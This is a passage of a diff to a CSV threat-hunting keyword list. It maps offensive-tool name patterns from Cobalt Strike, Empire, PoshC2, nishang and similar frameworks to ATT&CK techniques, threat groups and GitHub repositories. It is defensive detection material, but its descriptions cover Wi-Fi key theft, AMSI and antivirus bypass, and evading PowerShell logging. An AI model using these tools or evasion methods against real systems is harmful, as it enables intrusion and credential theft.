- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_x64.o*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" -"*GetWhoamiCommand*","offensive_tool_keyword","C2 related tools","PowerShell 
rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*GetWhoamiCommand.cs*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWhoamiCommand*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWhoamiCommand.cs*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*GetWindowsCredentials.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*Get-Wlan-Keys*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-WLAN-Keys*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Get-WLAN-Keys.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Get-WLAN-Keys*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-WLAN-Keys.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*getwmiregcachedrdpconnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 
- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" 
-"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-wmiregcachedrdpconnection*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - 
T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregcachedrdpconnection*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*getwmireglastloggedon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-wmireglastloggedon*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*Get-WMIRegMountedDrive*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-wmiregmounteddrive*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 
- T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmireglastloggedon*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 
- T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WMIRegMountedDrive*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 